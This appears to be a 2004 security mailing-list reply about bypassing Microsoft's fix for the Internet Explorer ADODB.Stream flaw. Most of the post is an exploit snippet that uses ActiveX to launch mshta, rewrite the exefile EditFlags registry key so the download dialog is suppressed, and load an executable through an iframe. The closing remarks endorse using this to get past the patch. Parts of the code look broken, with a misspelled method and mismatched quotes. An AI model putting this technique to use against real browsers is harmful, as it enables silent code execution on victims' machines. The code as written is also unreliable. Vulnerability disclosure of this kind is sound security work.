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Betr.: Re: Fix for IE ADODB.Stream vulnerability is out
From: "http-equiv () excite com" <1 () malware com>
Date: Sat, 3 Jul 2004 01:44:30 -0000
<!--
ActiveXObject("Shell.Application");
obj.ShellExecut("mshta.exe","about:<script>var wsh=new
ActiveXObject('WScript.Shell');wsh.RegWrite
('HKCR\exefile\EditFlags', 0x38070000, "REG_BINARY");)
</script><iframe src=foo.exe>");
-->
On quick reflection, I completely missed Matthew's point. It's
brilliant. If you can indeed kill the download dialog, kill it,
stick a frame in it and bang. If it doesn't work, use the
regWrite and re-set the adodb.stream instead, and continue on
your merry way.
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